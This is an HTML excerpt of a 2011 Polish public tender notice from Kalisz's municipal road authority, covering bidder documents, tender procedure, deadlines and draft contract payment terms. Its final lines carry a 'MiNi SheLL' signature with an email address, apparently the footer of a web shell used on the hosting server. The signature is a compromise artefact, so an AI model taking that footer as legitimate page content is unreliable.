<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Termin, o którym mowa w ust. 1 może ulec zmianie w przypadku zmiany terminu wykonania dokumentacji projektowej oraz robót o czas ich wykonania określony umową z wykonawcą projektu i robót budowlanych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdm.kalisz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Miejskich w Kaliszu ul. Złota 43, 62-800 Kalisz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.12.2011 godzina 12:00, miejsce: Zarząd Dróg Miejskich w Kaliszu ul. Złota 43, 62-800 Kalisz - sekretariat, I piętro pok. 201.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> zgodnie z pkt. 5 siwz: Termin wykonania zamówienia: 
5.1. Termin pełnienia nadzoru obejmuje okres od dnia zawarcia umowy do czasu zakończenia realizacji robót budowlanych oraz 61 miesięczny okres rękojmi (liczony od daty odbioru końcowego).
- Planowany termin zakończenia fazy I (opracowanie dokumentacji projektowej) - 30.06.2012 r.
- Planowany termin zakończenia fazy II (budowa ZSZRD) - 31.07.2013r.
- Planowany termin rozliczenia prac rozumiany jako data podpisania końcowego protokołu 
  odbioru do 30.08.2013r.
5.2. Termin, o którym mowa w ust. 1 może ulec zmianie w przypadku zmiany terminu wykonania dokumentacji projektowej oraz robót o czas ich wykonania określony umową z wykonawcą projektu i robót budowlanych.
Zgodnie z § 4 Projektu umowy
§ 4
1.	Strony ustalają wynagrodzenie ryczałtowe za przedmiot umowy w kwocie brutto: ... zł (słownie złotych: ... ).
2.	Wynagrodzenie zawiera podatek VAT.
3.	Wynagrodzenie o którym mowa w ust. 1 jest niezmienne przez okres obowiązywania umowy.
4.	Wzrost wartości opracowania dokumentacji oraz robót budowlanych nie powoduje wzrostu wynagrodzenia dla Inżyniera Kontraktu.
5.	Wydłużenie terminu realizacji przedmiotu zamówienia określonego w § 2 ust.1 nie powoduje wzrostu wynagrodzenia Wykonawcy.
6.	Wynagrodzenie Wykonawcy (Inżyniera Kontraktu)  rozliczane będzie fakturami częściowymi w odstępach kwartalnych w wysokości proporcjonalnej do % zaawansowania opracowania dokumentacji oraz robót.
7.	Suma faktur częściowych nie może przekroczyć  80% wartości zamówienia. 
8.	Ostateczne rozliczenie tj.: pozostałe 20 % wartości wynagrodzenia, nastąpi fakturą końcową po dokonaniu odbioru i rozliczeniu projektu. 
9.	Wartość wynagrodzenia określoną w fakturze należy podać w rozbiciu  na poszczególne branże.
10.	Pierwsza faktura częściowa może być wystawiona w roku 2012.
11.	Wartość wynagrodzenia jaka może zostać zapłacona Wykonawcy w 2012r. nie może przekroczyć kwoty 179.370,00 zł brutto (słownie: sto siedemdziesiąt dziewięć tysięcy trzysta siedemdziesiąt złotych 00/100.
12.	Pozostała wartość wynagrodzenia tj.: ... (słownie: ...) zostanie zapłacona w 2013r.
13.	W przypadku zafakturowania przez Wykonawcę w 2012r. kwoty, która przekroczy wartość 179.370,00 zł brutto, to różnica pomiędzy sumą faktur wystawionych w 2012r. a kwotą 179.370,00 zł zostanie zapłacona w terminie do 31.01.2013r.
14.	Wykonawca oświadcza, że nie będzie żądał odsetek z tytułu wydłużonego terminu płatności, o którym mowa w ust. 13.
15.	Podstawą do wystawienia faktur będą odpowiednio zatwierdzone protokoły odbiorów częściowych i protokół odbioru końcowego.
16.	Zapłata za wystawione faktury będzie regulowana w terminie  21 dni od daty ich doręczenia z zastrzeżeniem ust. 13.
17.	Wynagrodzenie płatne będzie poleceniem przelewu  na konto Wykonawcy 
w banku ... nr ... 
18.	Za datę zapłaty  przyjmuje się datę obciążenia rachunku  Zamawiającego.
19.	Wykonawca oświadcza że jest płatnikiem podatku VAT i posiada                           
 NIP ...
Zgodniej z § 12 Projektu umowy
§ 12
1. Wszelkie zmiany niniejszej umowy wymagają formy pisemnego aneksu pod 
    rygorem nieważności i mogą zostać dokonane, o ile nie stoją w sprzeczności
    z regulacjami zawartymi w ustawie Prawo zamówień publicznych. 
2. Zamawiający dopuszcza zmianę treści zawartej umowy w następujących 
    przypadkach zmiany przepisów prawa powszechnie obowiązującego, jeśli zmiana ta wpływa
    na zakres lub warunki wykonania przez strony świadczeń wynikających z umowy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com